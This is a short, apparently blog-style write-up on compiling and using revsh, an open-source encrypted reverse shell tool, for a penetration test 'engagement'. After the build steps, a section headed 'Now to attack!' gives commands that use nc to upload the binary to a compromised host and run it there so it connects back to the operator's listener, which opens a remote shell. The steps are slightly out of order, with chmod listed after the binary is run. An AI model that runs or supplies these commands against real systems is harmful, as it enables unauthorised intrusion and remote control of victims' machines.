Took a couple hours to figure out this tool and wrote a little write-up on the issues I found, how I solved them, and an example engagement. Props to @emptymonkey on twitter for the tool! https://github.com/emptymonkey/revsh.git
sudo apt-get install openssl libssl-dev # Pre-req for building.
git clone https://github.com/emptymonkey/revsh.git
nano config.h # (OPTIONAL) Set up new defaults that fit your situation.
Editing the Makefile
nano Makefile #EDIT THE MAKEFILE SO IT LOOKS LIKE THIS
CFLAGS = -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
LIBS = -lssl -lcrypto
KEYS_DIR = keys
KEY_OF_C = in_the_key_of_c
IO_DEP = io_ssl.c
## Linux w/static libraries.
#CFLAGS = -static -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
#LIBS = -lssl -lcrypto -ldl -lz
#KEYS_DIR = keys
#KEY_OF_C = in_the_key_of_c
#IO_DEP = io_ssl.c
mkdir /usr/local/share/man/man1 2&>/dev/null # Weird problem I ran into
make # This *can* take a very long time, though it usually doesn’t.
nano rc # (OPTIONAL) Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h # READY TO GO
Now to attack!
Once you get a shell, send the revsh binary with these commands:
nc -w 3 <ip> <port> < revsh
Once Uploaded run these commands:
revsh -c -vvv <ip>:<port>
chmod +x revsh
If you get a fingerprint mismatch, that means you did not use the same compiled binary for both sides, therefore, you need to run with the ‘-a’ flag.